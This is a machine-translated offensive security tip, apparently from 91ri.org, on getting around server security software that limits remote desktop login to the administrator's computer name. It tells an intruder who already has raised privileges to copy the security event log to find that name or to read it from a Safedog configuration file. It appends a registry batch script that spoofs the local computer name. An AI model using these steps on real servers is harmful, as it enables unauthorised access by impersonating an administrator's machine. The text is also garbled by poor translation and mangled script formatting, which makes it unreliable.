Break through some security software to restrict remote login to computer names

Break through some security software to restrict remote login to computer names

Problem

Some server security software allows administrators to specify the names of computers that can be logged on (the names of the computers on which the Administrator computers are located). If the names of the computers that are logged on are not administrator, the server security software will intercept the login behavior of the other party. At first glance, this method is quite safe, but it can only stop the intruders of Tom.

Solution

1. After improving your permissions, obtain the logon records of the remote server to know the Administrator's computer name.

copy C:\WINDOWS\system32\config\Secevent.evt c:\windows\temp\Secevent.evt

After the download, open the search in Notepad: r d p-T c p

At the same time, I have provided you with something that can modify the name of your local computer without restarting it, so that the passer can easily complete the Penetration Process, it is difficult to forward the Intranet port, but you have to restart to modify the computer name. :)

2. Through Reverse thinking, we can know that the server security software needs to save the Administrator's computer name to know what its computer name is and then verify it. Then we can search the configuration file of the server security software to obtain the Administrator's computer name.

For example, the configuration of a dog:

C:\Program Files\SafedogServer\SafeDogGuardCenter\ProGuardData.ini

If the obtained data is encrypted, we can build a local server security software for decryption. You know.

Appendix: script for modifying the computer name without restarting

@ Echo offecho AppLife. netset/p name = enter your computer name: reg add "HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ ComputerName \ ActiveComputerName"/v ComputerName/t reg_sz/d % name %/f> nul 2> nulreg add "HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Tcpip \ Parameters "/v" NV Hostname "/t reg_sz/d % name %/f> nul 2> nulreg add" HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Tcpip \ parameters "/v Hostname/t reg_sz/d % name %/f> nul 2> nulecho. echoecho. echo AppLife. netset/p work1 = enter your workgroup Name: wmic computersystem where Name = "% COMPUTERNAME %" call JoinDomainOrWorkgroup Name = "% work1 %" echo: pause> nulecho

91ri.org note: the two ideas in this article are old ideas. In practice, you may find that they are no longer valid, but penetration is flexible and diverse, you may be able to develop better skills based on the above ideas. We hope to bring your JADE: P